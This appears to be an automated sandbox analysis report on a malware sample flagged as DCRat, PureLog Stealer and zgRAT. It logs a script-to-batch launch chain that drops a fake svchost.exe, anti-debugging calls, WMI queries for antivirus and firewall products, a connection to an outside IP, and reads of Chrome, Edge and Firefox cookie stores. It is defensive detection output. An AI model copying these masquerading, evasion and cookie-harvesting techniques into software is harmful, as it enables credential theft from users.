Source: C:\comref\svchost.exe	Thread delayed: delay time: 599750	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 599469	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 598561	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 597401	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 595438	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 594266	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 593953	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 593625	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 593359	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 592766	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 592469	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 591984	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 591625	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 591125	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 590837	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 590500	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 589375	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 588969	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 588641	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 588219	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 587984	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 587766	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 587016	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 586625	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 586141	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 585560	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 584531	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 584045	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 583672	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 583141	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 582922	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 582438	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 581906	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 581563	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 581297	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 580813	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 580438	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 579844	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 579453	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 579078	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 578813	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 578266	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 578110	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 577995	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 577886	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 577767	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 577641	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 577525	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 577421	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 577310	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 577203	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 577093	Jump to behavior
Source: C:\comref\svchost.exe	Thread delayed: delay time: 576984	Jump to behavior

Source: NWrxbOzSkS.14.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: NWrxbOzSkS.14.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: NWrxbOzSkS.14.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: NWrxbOzSkS.14.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: NWrxbOzSkS.14.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: NWrxbOzSkS.14.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: NWrxbOzSkS.14.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: NWrxbOzSkS.14.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: NWrxbOzSkS.14.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: NWrxbOzSkS.14.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: ugRGgCJhQl.exe, 00000000.00000003.1237481545.00000000026D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: NWrxbOzSkS.14.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: NWrxbOzSkS.14.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: NWrxbOzSkS.14.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: NWrxbOzSkS.14.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: NWrxbOzSkS.14.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: NWrxbOzSkS.14.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: svchost.exe, 0000000E.00000002.3917020258.000000001C585000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: NWrxbOzSkS.14.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: NWrxbOzSkS.14.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: NWrxbOzSkS.14.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: NWrxbOzSkS.14.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: NWrxbOzSkS.14.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: NWrxbOzSkS.14.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: NWrxbOzSkS.14.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: NWrxbOzSkS.14.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: NWrxbOzSkS.14.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: NWrxbOzSkS.14.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: NWrxbOzSkS.14.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: NWrxbOzSkS.14.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: NWrxbOzSkS.14.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: NWrxbOzSkS.14.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: NWrxbOzSkS.14.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe

API call chain: ExitProcess graph end node

graph_0-23905

Source: C:\comref\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe

Code function: 0_2_002FF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_002FF838

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe

Code function: 0_2_00307DEE mov eax, dword ptr fs:[00000030h]

0_2_00307DEE

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe

Code function: 0_2_0030C030 GetProcessHeap,

0_2_0030C030

Source: C:\comref\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002FF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_002FF838
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002FF9D5 SetUnhandledExceptionFilter,	0_2_002FF9D5
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002FFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_002FFBCA
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_00308EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00308EBD

Source: C:\comref\svchost.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\comref\svchost.exe

Network Connect: 185.106.93.197 80

Jump to behavior

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\comref\POAHIjOuJ41OH.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comref\dbCG2LHUCV1kAJJ.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\comref\svchost.exe "C:\comref/svchost.exe"	Jump to behavior

Source: svchost.exe, 0000000E.00000002.3698250628.00000000029D9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000006FCA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000004FAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: svchost.exe, 0000000E.00000002.3698250628.0000000004FAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerosof

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe

Code function: 0_2_002FF654 cpuid

0_2_002FF654

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_002FAF0F

Source: C:\comref\svchost.exe	Queries volume information: C:\comref\svchost.exe VolumeInformation	Jump to behavior
Source: C:\comref\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\comref\svchost.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe

Code function: 0_2_002FDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_002FDF1E

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe

Code function: 0_2_002EB146 GetVersionExW,

0_2_002EB146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: svchost.exe, 0000000E.00000002.3698250628.0000000002E74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: eC:/Users/All Users\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.00000000033BC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.000000000539C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.000000000539C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.000000000383A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.0000000004A9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.0000000004877000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vC:/Users/All Users\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.0000000004877000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.00000000033BC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.000000000383A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: eC:/Users/All Users\Application Data\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.00000000029D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TC:/Users/All Users\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.0000000002E74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.000000000383A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.000000000383A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.00000000029D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TC:/Users/All Users\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.0000000004A9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.00000000046BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vC:/Users/All Users\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe

Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 0000000E.00000002.3783847798.0000000012AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3698250628.0000000007095000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3698250628.00000000029D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 4340, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: ugRGgCJhQl.exe, type: SAMPLE
Source: Yara match	File source: 0.3.ugRGgCJhQl.exe.69ee6cb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.ugRGgCJhQl.exe.60de6cb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.svchost.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.ugRGgCJhQl.exe.60de6cb.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.1292145325.0000000000232000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1235344386.00000000069A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1234987945.0000000006090000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\comref\svchost.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: ugRGgCJhQl.exe, type: SAMPLE
Source: Yara match	File source: 0.3.ugRGgCJhQl.exe.69ee6cb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.ugRGgCJhQl.exe.60de6cb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.svchost.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.ugRGgCJhQl.exe.60de6cb.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\comref\svchost.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
